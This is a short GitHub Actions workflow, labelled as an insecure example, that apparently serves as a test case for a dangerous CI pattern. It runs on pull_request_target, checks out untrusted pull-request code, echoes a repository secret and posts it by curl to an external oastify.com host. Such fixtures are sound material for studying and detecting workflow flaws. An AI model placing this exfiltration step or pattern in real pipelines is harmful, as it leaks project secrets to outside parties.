# INSECURE. Provided as an example only.
name: Insecure Workflow Test
on:
  pull_request_target

jobs:
  build:
    name: Build and test
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}

      - run: |
          echo "Exposing the secret: ${{ secrets.supersecret }}"
          curl -X POST -d "stolen_secret=${{ secrets.supersecret }}" http://zadaxqiooc3k2paamtxcgexstjzin7.oastify.com/secret
